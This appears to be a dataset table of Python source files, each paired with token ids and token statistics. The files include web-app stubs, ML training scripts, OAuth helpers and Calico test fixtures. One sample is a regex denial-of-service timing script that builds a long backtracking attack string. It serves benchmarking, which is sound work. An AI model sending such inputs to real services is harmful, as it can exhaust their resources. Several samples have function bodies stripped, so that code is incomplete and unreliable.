content stringlengths 1 1.04M | input_ids listlengths 1 774k | ratio_char_token float64 0.38 22.9 | token_count int64 1 774k |
|---|---|---|---|
from flask import request
from . import api_blueprint
from data import db
from data import User
from data import CoffeeShop
@api_blueprint.route('/')
@api_blueprint.route('/add_user1')
@api_blueprint.route('/users1')
@api_blueprint.route('/coffeeshops1')
| [
6738,
42903,
1330,
2581,
198,
6738,
764,
1330,
40391,
62,
17585,
4798,
198,
6738,
1366,
1330,
20613,
198,
6738,
1366,
1330,
11787,
198,
6738,
1366,
1330,
19443,
29917,
628,
198,
31,
15042,
62,
17585,
4798,
13,
38629,
10786,
14,
11537,
6... | 2.988636 | 88 |
import numpy as np
#from pyminc.volumes.factory import *
import os
from sys import argv, exit
from os.path import exists
from os import makedirs
import argparse
#local modules defined in current project
from make_and_run_model import *
from predict import *
from prepare_data import *
from utils import *
from custom_loss import *
from plot_metrics import *
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Process some integers.')
parser.add_argument('--batch-size', dest='batch_size', type=int, default=1, help='size of batch')
parser.add_argument('--source', dest='source_dir', required=True, type=str, help='source directory')
parser.add_argument('--target', dest='target_dir', required=True,type=str, default="results", help='target directory for output (Default: results)')
parser.add_argument('--epochs', dest='nb_epoch', type=int,default=10, help='number of training epochs')
parser.add_argument('--pad', dest='pad', type=int,default=0, help='Images must be divisible by 2^<pad>. Default = 0 ')
parser.add_argument('--loss', dest='loss', type=str,default='categorical_crossentropy', help='Loss function to optimize network')
parser.add_argument('--nK', dest='nK', type=str,default='16,32,64,128', help='number of kernels')
parser.add_argument('--n_dil', dest='n_dil', type=str,default=None, help='number of dilations')
parser.add_argument('--kernel-size', dest='kernel_size', type=int, default=3, help='Size of kernels')
parser.add_argument('--drop-out', dest='drop_out', type=float,default=0.0, help='Drop out rate')
parser.add_argument('--metric', dest='metric', type=str,default='categorical_accuracy', help='Categorical accuracy')
parser.add_argument('--activation-output', dest='activation_output', type=str,default='softmax', help='Activation function for last layer of network')
parser.add_argument('--activation-hidden', dest='activation_hidden', type=str,default='relu', help='Activation function for core convolutional layers of network')
#parser.add_argument('--feature-dim', dest='feature_dim', type=int,default=2, help='Warning: option temporaily deactivated. Do not use. Format of features to use (3=Volume, 2=Slice, 1=profile')
parser.add_argument('--model', dest='model_fn', default='model.hdf5', help='model file where network weights will be saved/loaded. will be automatically generated if not provided by user')
parser.add_argument('--model-type', dest='model_type', default='model_0_0', help='Name of network architecture to use (Default=model_0_0): unet, model_0_0 (simple convolution-only network), dil (same as model_0_0 but with dilations).')
parser.add_argument('--ratios', dest='ratios', nargs=2, type=float , default=[0.7,0.15,0.15], help='List of ratios for training, validating, and testing (default = 0.7 0.15 0.15)')
parser.add_argument('--predict', dest='images_to_predict', type=str, default=None, help='either 1) \'all\' to predict all images OR a comma separated list of index numbers of images on which to perform prediction (by default perform none). example \'1,4,10\' ')
parser.add_argument('--input-str', dest='input_str', type=str, default='pet', help='String for input (X) images')
parser.add_argument('--label-str', dest='label_str', type=str, default='brainmask', help='String for label (Y) images')
parser.add_argument('--clobber', dest='clobber', action='store_true', default=False, help='clobber')
parser.add_argument('--make-model-only', dest='make_model_only', action='store_true', default=False, help='Only build model and exit.')
parser.add_argument('-v', '--verbose', dest='verbose', type=int,default=1, help='Level of verbosity (0=silent, 1=basic (default), 2=detailed, 3=debug')
args = parser.parse_args()
args.feature_dim =2
minc_keras(args.source_dir, args.target_dir, input_str=args.input_str, label_str=args.label_str, ratios=args.ratios, batch_size=args.batch_size, nb_epoch=args.nb_epoch, clobber=args.clobber, model_fn = args.model_fn ,model_type=args.model_type, images_to_predict= args.images_to_predict, loss=args.loss, nK=args.nK, n_dil=args.n_dil, kernel_size=args.kernel_size, drop_out=args.drop_out, activation_hidden=args.activation_hidden, activation_output=args.activation_output, metric=args.metric, pad_base=args.pad, verbose=args.verbose, make_model_only=args.make_model_only)
| [
11748,
299,
32152,
355,
45941,
198,
2,
6738,
12972,
1084,
66,
13,
10396,
8139,
13,
69,
9548,
1330,
1635,
198,
11748,
28686,
198,
6738,
25064,
1330,
1822,
85,
11,
8420,
198,
6738,
28686,
13,
6978,
1330,
220,
7160,
198,
6738,
28686,
133... | 3.037113 | 1,455 |
# -*- coding: utf-8 -*-
from flattrclient.validators import isInt
from flattrclient.validators import isStr
from flattrclient.validators import isBinary
from flattrclient.validators import isUrl
from flattrclient.validators import isStrList
from flattrclient.validators import validate
import sys
from pytest import raises
| [
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
6738,
27172,
81,
16366,
13,
12102,
2024,
1330,
318,
5317,
198,
6738,
27172,
81,
16366,
13,
12102,
2024,
1330,
318,
13290,
198,
6738,
27172,
81,
16366,
13,
12102,
2024,
1... | 3.452632 | 95 |
from setuptools import setup
setup(name='airflow_impatient',
version='0.0.2',
description='Customized logging handlers, hooks and operators for Airflow to be run in K8s',
url='https://pypi.org/project/airflow-impatient/',
author='Shengyi Pan',
author_email='shengyi.pan@ibm.com',
license='Apache',
package_data={'airflow_impatient': ['LICENSE']},
packages=['airflow_impatient.logging', 'airflow_impatient.hooks', 'airflow_impatient.operators'],
zip_safe=False) | [
6738,
900,
37623,
10141,
1330,
9058,
198,
198,
40406,
7,
3672,
11639,
958,
11125,
62,
320,
26029,
3256,
198,
220,
220,
220,
220,
220,
2196,
11639,
15,
13,
15,
13,
17,
3256,
198,
220,
220,
220,
220,
220,
6764,
11639,
15022,
1143,
189... | 2.536946 | 203 |
from copy import copy
#sbaas lims
from SBaaS_LIMS.lims_biologicalMaterial_query import lims_biologicalMaterial_query
#sbaas
from .stage01_resequencing_lineage_io import stage01_resequencing_lineage_io
from .stage01_resequencing_gd_query import stage01_resequencing_gd_query
#sbaas models
from .stage01_resequencing_lineage_postgresql_models import *
#resources
from sequencing_analysis.genome_annotations import genome_annotations
from python_statistics.calculate_interface import calculate_interface
from python_statistics.calculate_count import calculate_count | [
6738,
4866,
1330,
4866,
198,
2,
82,
7012,
292,
1761,
82,
198,
6738,
18056,
7252,
50,
62,
43,
3955,
50,
13,
2475,
82,
62,
8482,
2770,
17518,
62,
22766,
1330,
1761,
82,
62,
8482,
2770,
17518,
62,
22766,
198,
2,
82,
7012,
292,
198,
... | 3.305882 | 170 |
# 1712
# (\s)*(int|void|float|char|double|string)((\s)|(\*))*(\&?)(\s)+([a-z])([a-z0-9])*(\s)*(\()(\s)*((int|void|float|char|double|string)((\s)|(\*))*(\&?)(\s)+([a-z])([a-z0-9])*((\s)*[,](\s)*(int|void|float|char|double|string)((\s)|(\*))*(\&?)(\s)+([a-z])([a-z0-9])*)*)?(\s)*(\))(\s)*;
# POLYNOMIAL
# nums:5
# POLYNOMIAL AttackString:"int"+"\t"*5000+"◎@! _1!_1!1 _!1 _!_1◎@! _1!_1! _1!_1◎@! _1!_1! _1!_1!\n_SLQ_3"
import re2 as re
from time import perf_counter
regex = """(\s)*(int|void|float|char|double|string)((\s)|(\*))*(\&?)(\s)+([a-z])([a-z0-9])*(\s)*(\()(\s)*((int|void|float|char|double|string)((\s)|(\*))*(\&?)(\s)+([a-z])([a-z0-9])*((\s)*[,](\s)*(int|void|float|char|double|string)((\s)|(\*))*(\&?)(\s)+([a-z])([a-z0-9])*)*)?(\s)*(\))(\s)*;"""
REGEX = re.compile(regex)
for i in range(0, 150000):
ATTACK = "int" + "\t" * i * 10000 + "◎@! _1!_1!1 _!1 _!_1◎@! _1!_1! _1!_1◎@! _1!_1! _1!_1!\n_SLQ_3"
LEN = len(ATTACK)
BEGIN = perf_counter()
m = REGEX.search(ATTACK)
# m = REGEX.match(ATTACK)
DURATION = perf_counter() - BEGIN
print(f"{i *10000}: took {DURATION} seconds!") | [
2,
1596,
1065,
198,
2,
357,
59,
82,
27493,
7,
600,
91,
19382,
91,
22468,
91,
10641,
91,
23352,
91,
8841,
5769,
38016,
82,
14726,
38016,
9,
4008,
9,
38016,
5,
30,
5769,
59,
82,
47762,
26933,
64,
12,
89,
60,
5769,
58,
64,
12,
89... | 1.786174 | 622 |
from .models import *
import json
from django.core.exceptions import PermissionDenied
import requests
import os
import base64
import urllib
from .models import OAuthCache
import random
from django.utils import timezone
from django.conf import settings
module_path = os.path.dirname(__file__)
REDIRECT_URI = settings.MY_BASE_URL + '/login/'
ISSUER = 'https://oidc.mit.edu/'
AUTH_CODE_URL = 'https://oidc.mit.edu/authorize'
AUTH_TOKEN_URL = 'https://oidc.mit.edu/token'
AUTH_USER_INFO_URL = 'https://oidc.mit.edu/userinfo'
LOGIN_TIMEOUT = 600
AUTH_SCOPES = ['email', 'openid', 'profile', 'offline_access']
AUTH_RESPONSE_TYPE = 'code'
def oauth_code_url(request, after_redirect=None):
"""after_redirect is used to redirect to an application site with a
temporary code AFTER FireRoad has created the user's account. It should be
None for mobile apps and a string for websites."""
# Create a state and nonce, and save them
cache = OAuthCache(state=generate_random_string(48), nonce=generate_random_string(48), redirect_uri=after_redirect)
sem = request.GET.get('sem', '')
if len(sem) > 0:
cache.current_semester = sem
cache.save()
return "{}?response_type={}&client_id={}&redirect_uri={}&scope={}&state={}&nonce={}".format(
AUTH_CODE_URL,
AUTH_RESPONSE_TYPE,
get_client_info()[0],
urllib.quote(REDIRECT_URI),
urllib.quote(' '.join(AUTH_SCOPES)),
cache.state,
cache.nonce)
| [
6738,
764,
27530,
1330,
1635,
198,
11748,
33918,
198,
6738,
42625,
14208,
13,
7295,
13,
1069,
11755,
1330,
2448,
3411,
21306,
798,
198,
11748,
7007,
198,
11748,
28686,
198,
11748,
2779,
2414,
198,
11748,
2956,
297,
571,
198,
6738,
764,
... | 2.56 | 575 |
import requests, json, sys, os, time, datetime
from werkzeug.exceptions import HTTPException
from flask import Flask, abort, request, jsonify, Response, make_response
from flask_restful import Resource
from flask_restful.utils import cors
from utils import TRUE_WORDS, FALSE_WORDS, NONE_WORDS
from utils.api import add_assets, get_assets
from functools import wraps
from utils import auth
# @auth.requires_auth
| [
11748,
7007,
11,
33918,
11,
25064,
11,
28686,
11,
640,
11,
4818,
8079,
198,
6738,
266,
9587,
2736,
1018,
13,
1069,
11755,
1330,
14626,
16922,
198,
6738,
42903,
1330,
46947,
11,
15614,
11,
2581,
11,
33918,
1958,
11,
18261,
11,
787,
62,... | 3.438017 | 121 |
import aio_pika
import aiopg
import asyncio
import json
import os
from aio_pika.pool import Pool
from distutils.util import strtobool
| [
11748,
257,
952,
62,
79,
9232,
198,
11748,
257,
14922,
70,
198,
11748,
30351,
952,
198,
11748,
33918,
198,
11748,
28686,
198,
6738,
257,
952,
62,
79,
9232,
13,
7742,
1330,
19850,
198,
6738,
1233,
26791,
13,
22602,
1330,
965,
83,
672,
... | 3.068182 | 44 |
import numpy as np
import cv2
import glob
import argparse
import pdb
import sys
#sys.path.append('../../../../../train_src/analysis/')
import pathlib
from PredictionsLoader import PredictionsLoaderNPY, PredictionsLoaderModel
from utils import seq_add_padding, add_padding
import pdb
sys.path.append('../../../train_src/')
from model_input_mode import MIMFixed, MIMVarLabel, MIMVarSeqLabel, MIMVarLabel_PaddedSeq, MIMFixedLabelAllLabels
sys.path.append('../../../../../dataset/dataset/patches_extract_script/')
from dataSource import DataSource, SARSource, OpticalSource, Dataset, LEM, LEM2, CampoVerde, OpticalSourceWithClouds, Humidity
parser = argparse.ArgumentParser(description='')
parser.add_argument('-ds', '--dataset', dest='dataset',
default='cv', help='t len')
parser.add_argument('-mdl', '--model', dest='model_type',
default='densenet', help='t len')
a = parser.parse_args()
dataset=a.dataset
model_type=a.model_type
direct_execution=True
if direct_execution==True:
dataset='l2'
model_type='unet'
path='../model/'
data_path='../../../../../dataset/dataset/'
if dataset=='lm':
path+='lm/'
if model_type=='densenet':
predictions_path=path+'prediction_DenseNetTimeDistributed_128x2_batch16_full.npy'
elif model_type=='biconvlstm':
predictions_path=path+'prediction_ConvLSTM_seq2seq_bi_batch16_full.npy'
elif model_type=='convlstm':
predictions_path=path+'prediction_ConvLSTM_seq2seq_batch16_full.npy'
elif model_type=='unet':
predictions_path=path+'prediction_BUnet4ConvLSTM_repeating1.npy'
#predictions_path=path+'prediction_BUnet4ConvLSTM_repeating2.npy'
#predictions_path=path+'prediction_BUnet4ConvLSTM_repeating4.npy'
elif model_type=='atrous':
predictions_path=path+'prediction_BAtrousConvLSTM_2convins5.npy'
elif model_type=='atrousgap':
predictions_path=path+'prediction_BAtrousGAPConvLSTM_raulapproved.npy'
#predictions_path=path+'prediction_BAtrousGAPConvLSTM_repeating3.npy'
#predictions_path=path+'prediction_BAtrousGAPConvLSTM_repeating4.npy'
mask_path=data_path+'lm_data/TrainTestMask.tif'
location_path=data_path+'lm_data/locations/'
folder_load_path=data_path+'lm_data/train_test/test/labels/'
custom_colormap = np.array([[255,146,36],
[255,255,0],
[164,164,164],
[255,62,62],
[0,0,0],
[172,89,255],
[0,166,83],
[40,255,40],
[187,122,83],
[217,64,238],
[0,113,225],
[128,0,0],
[114,114,56],
[53,255,255]])
elif dataset=='cv':
path+='cv/'
if model_type=='densenet':
predictions_path=path+'prediction_DenseNetTimeDistributed_128x2_batch16_full.npy'
elif model_type=='biconvlstm':
predictions_path=path+'prediction_ConvLSTM_seq2seq_bi_batch16_full.npy'
elif model_type=='convlstm':
predictions_path=path+'prediction_ConvLSTM_seq2seq_batch16_full.npy'
elif model_type=='unet':
#predictions_path=path+'prediction_BUnet4ConvLSTM_repeating2.npy'
predictions_path=path+'model_best_BUnet4ConvLSTM_int16.h5'
elif model_type=='atrous':
predictions_path=path+'prediction_BAtrousConvLSTM_repeating2.npy'
elif model_type=='atrousgap':
#predictions_path=path+'prediction_BAtrousGAPConvLSTM_raulapproved.npy'
#predictions_path=path+'prediction_BAtrousGAPConvLSTM_repeating4.npy'
predictions_path=path+'prediction_BAtrousGAPConvLSTM_repeating6.npy'
elif model_type=='unetend':
predictions_path=path+'prediction_unet_convlstm_temouri2.npy'
elif model_type=='allinputs':
predictions_path=path+'prediction_bconvlstm_wholeinput.npy'
mask_path=data_path+'cv_data/TrainTestMask.tif'
location_path=data_path+'cv_data/locations/'
folder_load_path=data_path+'cv_data/train_test/test/labels/'
custom_colormap = np.array([[255, 146, 36],
[255, 255, 0],
[164, 164, 164],
[255, 62, 62],
[0, 0, 0],
[172, 89, 255],
[0, 166, 83],
[40, 255, 40],
[187, 122, 83],
[217, 64, 238],
[45, 150, 255]])
elif dataset=='l2':
path+='l2/'
if model_type=='unet':
predictions_path=path+'prediction_BUnet4ConvLSTM_repeating1.npy'
#predictions_path=path+'prediction_BUnet4ConvLSTM_repeating2.npy'
#predictions_path=path+'prediction_BUnet4ConvLSTM_repeating4.npy'
predictions_path = path+'model_best_UUnet4ConvLSTM_doty_fixed_label_dec.h5'
mask_path=data_path+'l2_data/TrainTestMask.tif'
location_path=data_path+'l2_data/locations/'
folder_load_path=data_path+'l2_data/train_test/test/labels/'
custom_colormap = np.array([[255,146,36],
[255,255,0],
[164,164,164],
[255,62,62],
[0,0,0],
[172,89,255],
[0,166,83],
[40,255,40],
[187,122,83],
[217,64,238],
[0,113,225],
[128,0,0],
[114,114,56],
[53,255,255]])
print("Loading patch locations...")
#order_id_load=False
#if order_id_load==False:
# order_id=patch_file_id_order_from_folder(folder_load_path)
# np.save('order_id.npy',order_id)
#else:
# order_id=np.load('order_id.npy')
#cols=np.load(location_path+'locations_col.npy')
#rows=np.load(location_path+'locations_row.npy')
#print(cols.shape, rows.shape)
#cols=cols[order_id]
#rows=rows[order_id]
# ======== load labels and predictions
#labels=np.load(path+'labels.npy').argmax(axis=4)
#predictions=np.load(predictions_path).argmax(axis=4)
print("Loading labels and predictions...")
prediction_type = 'model'
results_path="../"
#path=results_path+dataset+'/'
#prediction_path=path+predictions_path
path_test='../../../../../dataset/dataset/'+dataset+'_data/patches_bckndfixed/test/'
print('path_test',path_test)
#prediction_type = 'model'
if prediction_type=='npy':
predictionsLoader = PredictionsLoaderNPY()
predictions, labels = predictionsLoader.loadPredictions(predictions_path,path+'labels.npy')
elif prediction_type=='model':
#model_path=results_path + 'model/'+dataset+'/'+prediction_filename
print('model_path',predictions_path)
predictionsLoader = PredictionsLoaderModel(path_test)
model = predictionsLoader.loadModel(predictions_path)
#================= load labels and predictions
#class_n=np.max(predictions)+1
#print("class_n",class_n)
#labels[labels==class_n]=255 # background
# Print stuff
#print(cols.shape)
#print(rows.shape)
#print(labels.shape)
#print(predictions.shape)
#print("np.unique(labels,return_counts=True)",
# np.unique(labels,return_counts=True))
#print("np.unique(predictions,return_counts=True)",
# np.unique(predictions,return_counts=True))
# Specify variables
#sequence_len=labels.shape[1]
#patch_len=labels.shape[2]
# Load mask
mask=cv2.imread(mask_path,-1)
mask[mask==1]=0 # training as background
print("Mask shape",mask.shape)
#print((sequence_len,)+mask.shape)
# ================= LOAD THE INPUT IMAGE.
full_path = '../../../../../dataset/dataset/'+dataset+'_data/full_ims/'
full_ims_test = np.load(full_path+'full_ims_test.npy')
full_label_test = np.load(full_path+'full_label_test.npy').astype(np.uint8)
# convert labels; background is last
class_n=len(np.unique(full_label_test))-1
full_label_test=full_label_test-1
full_label_test[full_label_test==255]=class_n
print(full_ims_test.shape)
print(full_label_test.shape)
# add doty
mim = MIMFixed()
data = {'labeled_dates': 12}
data['labeled_dates'] = 12
if dataset=='lm':
ds=LEM()
elif dataset=='l2':
ds=LEM2()
dataSource = SARSource()
ds.addDataSource(dataSource)
time_delta = ds.getTimeDelta(delta=True,format='days')
ds.setDotyFlag(True)
dotys, dotys_sin_cos = ds.getDayOfTheYear()
ds.dotyReplicateSamples(sample_n = 1)
# Reconstruct the image
print("Reconstructing the labes and predictions...")
patch_size=32
add_padding_flag=False
if add_padding_flag==True:
full_ims_test, stride, step_row, step_col, overlap = seq_add_padding(full_ims_test,patch_size,0)
#full_label_test, _, _, _, _ = seq_add_padding(full_label_test,32,0)
mask_pad, _, _, _, _ = add_padding(mask,patch_size,0)
else:
mask_pad=mask.copy()
stride=patch_size
overlap=0
print(full_ims_test.shape)
print(full_label_test.shape)
print(np.unique(full_label_test,return_counts=True))
sequence_len, row, col, bands = full_ims_test.shape
#pdb.set_trace()
prediction_rebuilt=np.ones((sequence_len,row,col)).astype(np.uint8)*255
print("stride", stride)
print(len(range(patch_size//2,row-patch_size//2,stride)))
print(len(range(patch_size//2,col-patch_size//2,stride)))
for m in range(patch_size//2,row-patch_size//2,stride):
for n in range(patch_size//2,col-patch_size//2,stride):
patch_mask = mask_pad[m-patch_size//2:m+patch_size//2 + patch_size%2,
n-patch_size//2:n+patch_size//2 + patch_size%2]
if np.any(patch_mask==2):
patch = {}
patch['in'] = full_ims_test[:,m-patch_size//2:m+patch_size//2 + patch_size%2,
n-patch_size//2:n+patch_size//2 + patch_size%2]
patch['in'] = np.expand_dims(patch['in'], axis = 0)
#patch = patch.reshape((1,patch_size,patch_size,bands))
input_ = mim.batchTrainPreprocess(patch, ds,
label_date_id = -1) # tstep is -12 to -1
#print(input_[0].shape)
#pdb.set_trace()
pred_cl = model.predict(input_).argmax(axis=-1)
# print(pred_cl.shape)
#_, x, y = pred_cl.shape
prediction_rebuilt[:,m-stride//2:m+stride//2,n-stride//2:n+stride//2] = pred_cl[:,overlap//2:x-overlap//2,overlap//2:y-overlap//2]
del full_ims_test
label_rebuilt=full_label_test.copy()
del full_label_test
if add_padding_flag==True:
prediction_rebuilt=prediction_rebuilt[:,overlap//2:-step_row,overlap//2:-step_col]
print("---- pad was removed")
print(prediction_rebuilt.shape, mask.shape, label_rebuilt.shape)
# ========== metrics get =======#
metrics = metrics_get(label_rebuilt, prediction_rebuilt, mask)
print(metrics)
# everything outside mask is 255
for t_step in range(sequence_len):
label_rebuilt[t_step][mask==0]=255
prediction_rebuilt[t_step][mask==0]=255
#label_rebuilt[label_rebuilt==class_n]=255
print("everything outside mask is 255")
print(np.unique(label_rebuilt,return_counts=True))
print(np.unique(prediction_rebuilt,return_counts=True))
# Paint it!
print(custom_colormap.shape)
#class_n=custom_colormap.shape[0]
#=== change to rgb
print("Gray",prediction_rebuilt.dtype)
prediction_rgb=np.zeros((prediction_rebuilt.shape+(3,))).astype(np.uint8)
label_rgb=np.zeros_like(prediction_rgb)
print("Adding color...")
for t_step in range(sequence_len):
prediction_rgb[t_step]=cv2.cvtColor(prediction_rebuilt[t_step],cv2.COLOR_GRAY2RGB)
label_rgb[t_step]=cv2.cvtColor(label_rebuilt[t_step],cv2.COLOR_GRAY2RGB)
print("RGB",prediction_rgb.dtype,prediction_rgb.shape)
for idx in range(custom_colormap.shape[0]):
print("Assigning color. t_step:",idx)
for chan in [0,1,2]:
prediction_rgb[:,:,:,chan][prediction_rgb[:,:,:,chan]==idx]=custom_colormap[idx,chan]
label_rgb[:,:,:,chan][label_rgb[:,:,:,chan]==idx]=custom_colormap[idx,chan]
print("RGB",prediction_rgb.dtype,prediction_rgb.shape)
#for idx in range(custom_colormap.shape[0]):
# for chan in [0,1,2]:
# prediction_rgb[:,:,chan][prediction_rgb[:,:,chan]==correspondence[idx]]=custom_colormap[idx,chan]
print("Saving the resulting images for all dates...")
for t_step in range(sequence_len):
label_rgb[t_step]=cv2.cvtColor(label_rgb[t_step],cv2.COLOR_BGR2RGB)
prediction_rgb[t_step]=cv2.cvtColor(prediction_rgb[t_step],cv2.COLOR_BGR2RGB)
save_folder=dataset+"/"+model_type+"/"
pathlib.Path(save_folder).mkdir(parents=True, exist_ok=True)
cv2.imwrite(save_folder+"prediction_t"+str(t_step)+"_"+model_type+".png",prediction_rgb[t_step])
cv2.imwrite(save_folder+"label_t"+str(t_step)+"_"+model_type+".png",label_rgb[t_step])
print(prediction_rgb[0,0,0,:])
| [
220,
198,
11748,
299,
32152,
355,
45941,
198,
11748,
269,
85,
17,
198,
11748,
15095,
198,
11748,
1822,
29572,
198,
11748,
279,
9945,
198,
11748,
25064,
198,
2,
17597,
13,
6978,
13,
33295,
10786,
40720,
40720,
40720,
40720,
40720,
27432,
... | 2.294188 | 5,024 |
# Generated by Django 3.1.11 on 2021-05-27 21:02
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
| [
2,
2980,
515,
416,
37770,
513,
13,
16,
13,
1157,
319,
33448,
12,
2713,
12,
1983,
2310,
25,
2999,
198,
198,
6738,
42625,
14208,
13,
10414,
1330,
6460,
198,
6738,
42625,
14208,
13,
9945,
1330,
15720,
602,
11,
4981,
198,
11748,
42625,
... | 3.038462 | 52 |
#!/usr/bin/python
from PythonCard import model
colhead = ['Expression','Value']
| [
2,
48443,
14629,
14,
8800,
14,
29412,
198,
198,
6738,
11361,
16962,
1330,
2746,
198,
198,
4033,
2256,
796,
37250,
16870,
2234,
41707,
11395,
20520,
628,
198
] | 3.111111 | 27 |
#
# This source file is part of the EdgeDB open source project.
#
# Copyright 2008-present MagicStack Inc. and the EdgeDB authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from edgedb.lang.common import ast
from . import base as s_types
s_types.BaseTypeMeta.add_implementation(
'std::bool', Bool)
s_types.BaseTypeMeta.add_mapping(
Bool, 'std::bool')
s_types.BaseTypeMeta.add_mapping(
bool, 'std::bool')
s_types.TypeRules.add_rule(
ast.ops.OR, (Bool, Bool), 'std::bool')
s_types.TypeRules.add_rule(
ast.ops.AND, (Bool, Bool), 'std::bool')
s_types.TypeRules.add_rule(
ast.ops.NOT, (Bool,), 'std::bool')
| [
2,
198,
2,
770,
2723,
2393,
318,
636,
286,
262,
13113,
11012,
1280,
2723,
1628,
13,
198,
2,
198,
2,
15069,
3648,
12,
25579,
6139,
25896,
3457,
13,
290,
262,
13113,
11012,
7035,
13,
198,
2,
198,
2,
49962,
739,
262,
24843,
13789,
11... | 2.997368 | 380 |
import os
import numpy as np
from util import load_data, ROOT_PATH,_sqdist
from sklearn.decomposition import PCA
if __name__ == '__main__':
for ind in range(400):
for sname in ['mnist_z','mnist_x','mnist_xz']:
precomp(sname,ind)
folder = ROOT_PATH+'/mnist_precomp/'
os.makedirs(folder, exist_ok=True)
for sname in ['mnist_z','mnist_x','mnist_xz']:
if sname in ['mnist_z','mnist_xz']:
train_K0 = []
dev_K0 = []
for w_id in range(400):
res = np.load(ROOT_PATH+'/tmp/{}_K_{}.npz'.format(sname,w_id))
os.remove(ROOT_PATH+'/tmp/{}_K_{}.npz'.format(sname,w_id))
train_K0 += [res['train_K0']]
dev_K0 += [res['dev_K0']]
train_K0 = np.vstack(train_K0)
dev_K0 = np.vstack(dev_K0)
np.save(folder+'{}_train_K0.npy'.format(sname), train_K0)
np.save(folder+'{}_dev_K0.npy'.format(sname), dev_K0)
dist = np.sqrt(train_K0)
a = np.median(dist.flatten())
np.save(folder+'{}_ak.npy'.format(sname), a)
if sname in ['mnist_x','mnist_xz']:
train_L0 = []
test_L0 = []
for i in range(8):
L0 = np.load(ROOT_PATH+'/tmp/{}_L_{}.npz'.format(sname,i))
os.remove(ROOT_PATH + '/tmp/{}_L_{}.npz'.format(sname,i))
train_L0 += [L0['train_L0']]
test_L0 += [L0['test_L0']]
np.savez(folder+'{}_Ls.npz'.format(sname),train_L0=train_L0, test_L0=test_L0)
| [
11748,
28686,
198,
11748,
299,
32152,
355,
45941,
198,
6738,
7736,
1330,
3440,
62,
7890,
11,
15107,
2394,
62,
34219,
11,
62,
31166,
17080,
198,
6738,
1341,
35720,
13,
12501,
296,
9150,
1330,
4217,
32,
198,
198,
361,
11593,
3672,
834,
... | 1.705059 | 929 |
# Copyright (c) 2017 Tigera, Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
data = {}
data['bgppeer_long_node_name'] = {
'apiVersion': 'v1',
'kind': 'bgpPeer',
'metadata': {
'scope': 'node',
'node': '.123Im_a_Little.Teapot-Short_And-Stout.Heres-My-Handle_Heres_My.Spout.Im_Also.A.Very.LongNodeNameTryingTo-CatchOut_UpgradeCode75',
'peerIP': '192.168.255.255',
},
'spec': {
'asNumber': "4294967294",
},
}
data['bgppeer_dotted_asn'] = {
'apiVersion': 'v1',
'kind': 'bgpPeer',
'metadata': {
'scope': 'global',
'peerIP': '2006::2:1',
},
'spec': {
'asNumber': "1.10",
},
}
data['hep_tame'] = {
'apiVersion': 'v1',
'kind': 'hostEndpoint',
'metadata': {'labels': {'type': 'production'},
'name': 'eth0',
'node': 'myhost'},
'spec': {'expectedIPs': ['192.168.0.1', '192.168.0.2'],
'interfaceName': 'eth0',
'profiles': ['profile1', 'profile2']}
}
data['hep_long_fields'] = {
'apiVersion': 'v1',
'kind': 'hostEndpoint',
'metadata': {'labels': {
'8roper.evil/02.key_name.which.is-also_very.long...1234567890.p': 'frontendFrontEnd.0123456789-_-23wdffrontendFrontEnd.0124679-_-0',
'calico/k8s_ns': 'default',
'type': 'type-endFrontEnd.0123456789-_-23wdffrontendFrontEnd.0124679-_-0'},
'name': '.123Im_a_LongInterfaceNameTryingToCatchOutUpgradeCode75',
'node': '.123Im_a_Little.Teapot-Short_And-Stout.Heres-My-Handle_Heres_My.Spout.Im_Also.A.Very.LongNodeNameTryingTo-CatchOut_UpgradeCode75'},
'spec': {'expectedIPs': ['fd00:1::321'],
'interfaceName': 'eth0',
'profiles': ['profile1', 'profile2']}
}
data['hep_label_too_long'] = {
'apiVersion': 'v1',
'kind': 'hostEndpoint',
'metadata': {'labels': {
'8roper.evil/02.key_name.which.is-also_very.long...1234567890..proper.evil-02.key_name.which.is-also_very.long...1234567890..proper.evil-02.Key_Name.which.is-also_very.long...1234567890..proper.evil-02.key_name.which.is-also_very.long...1234567890..proper.evil-02.Key_name.which.is-also_very.long...1234567890..proper.evil-02.key_name.which.is-also_very.long...1234567890..proper.evil-02.key_Name.which.is-also_very.long...1234567890..proper.evil-02.key_name.which.is-also_very.long...1234567890..proper.evil-02.9': 'frontendFrontEnd.0123456789-_-23wdffrontendFrontEnd.0124679-_-0',
'calico/k8s_ns': 'default',
'type': 'type-endFrontEnd.0123456789-_-23wdffrontendFrontEnd.0124679-_-0'},
'name': '.123Im_a_Little.Teapot-Short_And-Stout.Heres-My-Handle_Her.Im_AlsoAVeryLongInterfaceNameTryingToCatchOutUpgradeCode75',
'node': '.123Im_a_Little.Teapot-Short_And-Stout.Heres-My-Handle_Heres_My.Spout.Im_Also.A.Very.LongNodeNameTryingTo-CatchOut_UpgradeCode75'},
'spec': {'expectedIPs': ['fd00:1::321'],
'interfaceName': 'eth0',
'profiles': ['profile1', 'profile2']}
}
data['hep_bad_label'] = {
'apiVersion': 'v1',
'kind': 'hostEndpoint',
'metadata': {'labels': {
'8roper/evil-02/key_name.which/is-also_very.long...1234567890//proper/evil-02/key_name.which/is-also_very.long...1234567890//proper/evil-02/Key_Name.which/is-also_very.long...1234567890//proper/evil-02/key_name.which/is-also_very.long...1234567890//proper/evil-02/Key_name.which/is-also_very.long...1234567890//proper/evil-02/key_name.which/is-also_very.long...1234567890//proper/evil-02/key_Name.which/is-also_very.long...1234567890//proper/evil-02/key_name.which/is-also_very.long...1234567890//proper/evil-02/9': 'frontendFrontEnd.0123456789-_-23wdffrontendFrontEnd.0124679-_-0',
